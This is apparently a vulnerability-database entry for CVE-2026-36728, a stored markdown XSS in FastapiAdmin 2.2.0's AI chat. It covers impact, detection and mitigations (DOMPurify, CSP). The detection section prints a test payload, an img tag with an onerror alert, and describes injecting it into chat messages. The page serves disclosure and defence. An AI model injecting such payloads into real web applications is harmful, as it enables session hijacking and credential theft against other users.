CVE-2026-36728
Received Received - Intake
BaseFortify

Publication date: 2026-06-09

Last updated on: 2026-06-09

Assigner: MITRE

Description
A markdown based cross-site scripting (XSS) vulnerability in the AI assistant chat function of FastapiAdmin v2.2.0 allows attackers to execute arbitrary web scripts or HTML via injecting a crafted payload into a chat message.
CVSS Scores
EPSS Scores
Probability:
Percentile:
Meta Information
Published
2026-06-09
Last Modified
2026-06-09
Generated
2026-06-10
AI Q&A
2026-06-09
EPSS Evaluated
N/A
NVD
CVE-2026-36728
Affected Vendors & Products
Showing 2 associated CPEs
Vendor Product Version / Range
fastapiadmin fastapiadmin 2.2.0
fastapiadmin fastapiadmin to 2.2.0 (exc)
Helpful Resources
Exploitability
CWE
CWE Icon
KEV
KEV Icon
CWE ID Description
CWE-79 The product does not neutralize or incorrectly neutralizes user-controllable input before it is placed in output that is used as a web page that is served to other users.
Attack-Flow Graph
AI Quick Actions
Instant insights powered by AI
Executive Summary

This vulnerability is a markdown-based Cross-Site Scripting (XSS) issue found in the AI assistant chat function of FastapiAdmin version 2.2.0 and earlier.

It occurs because user-supplied chat messages are stored without any sanitization or validation and then rendered on the frontend using the markdown-it library, which does not have built-in XSS protection.

As a result, an authenticated attacker can inject malicious JavaScript code into chat messages that will execute when other users view those messages.

Impact Analysis

This vulnerability can lead to serious security impacts including session hijacking, credential theft, and unauthorized actions performed on behalf of victims.

Because the malicious script executes in the context of the victim's browser, attackers can steal sensitive information or manipulate the application to perform harmful operations.

Detection Guidance

This vulnerability can be detected by testing the AI assistant chat functionality in FastapiAdmin for the presence of markdown-based XSS payload execution. Specifically, injecting crafted payloads such as <img src=x onerror='alert(1)' /> into chat messages and observing if the script executes when the message is rendered indicates the vulnerability.

Detection involves verifying if user-supplied message content is stored without sanitization and rendered using the markdown-it library with v-html, which allows arbitrary JavaScript execution.

While no specific commands are provided, a practical approach is to use the web interface to send test messages containing XSS payloads and monitor for script execution alerts or unexpected behavior.

Mitigation Strategies

Immediate mitigation steps include implementing HTML sanitization on user-supplied content after rendering markdown with markdown-it. Using libraries such as DOMPurify can help sanitize the HTML output to prevent XSS.

Alternatively, switching to a markdown editor with built-in XSS protection, like mavonEditor, can reduce the risk.

Additionally, deploying Content Security Policy (CSP) headers can help mitigate the impact of any potential exploits by restricting the execution of unauthorized scripts.

Chat Assistant
Ask questions about this CVE
Hi! I’m here to help you understand CVE-2026-36728. Ask me anything about the vulnerability, its impact, or mitigation strategies.
0/70
EPSS Chart